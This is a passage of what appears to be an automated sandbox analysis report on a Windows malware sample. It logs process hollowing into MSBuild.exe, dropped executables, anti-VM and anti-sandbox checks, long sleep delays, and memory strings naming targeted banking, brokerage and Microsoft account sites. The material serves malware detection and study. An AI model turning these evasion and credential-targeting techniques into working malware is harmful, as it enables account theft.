                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: 00000123.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\00000123.exeMemory allocated: 1B80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeMemory allocated: 35C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeMemory allocated: 1C20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeMemory allocated: 6F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeMemory allocated: 66B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3060000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 30F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3390000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 30F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comWindow / User API: threadDelayed 3719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1909
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6532
                  Source: C:\Users\user\Desktop\00000123.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\updatte.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comAPI coverage: 4.3 %
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com TID: 7996Thread sleep time: -37190s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -39000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38516s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38188s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38063s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37950s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37891s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37335s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37219s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36891s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36344s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36233s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35997s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35655s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2584Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\00000123.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comThread sleep count: Count: 3719 delay: -10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062D5 FindFirstFileW,FindClose,6_2_004062D5
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00402E18 FindFirstFileW,6_2_00402E18
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00406C9B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A087
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A1E2
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,28_2_0078E472
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,28_2_0079A570
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075C622 FindFirstFileExW,28_2_0075C622
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007966DC FindFirstFileW,FindNextFileW,FindClose,28_2_007966DC
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00797333 FindFirstFileW,FindClose,28_2_00797333
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,28_2_007973D4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078D921
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078DC54
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00725FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,28_2_00725FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38516
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35997
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\611485Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\611485\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: MSBuild.exe, 00000025.00000002.2830131442.000000000149A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: wscript.exe, 0000001A.00000003.2435191910.000001AE7EB14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: wscript.exe, 0000001A.00000003.2435191910.000001AE7EB14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d32_NECVMWar&Prod_VMware_SATA_C
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Users\user\Desktop\00000123.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079F4FF BlockInput,28_2_0079F4FF
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0072338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_0072338B
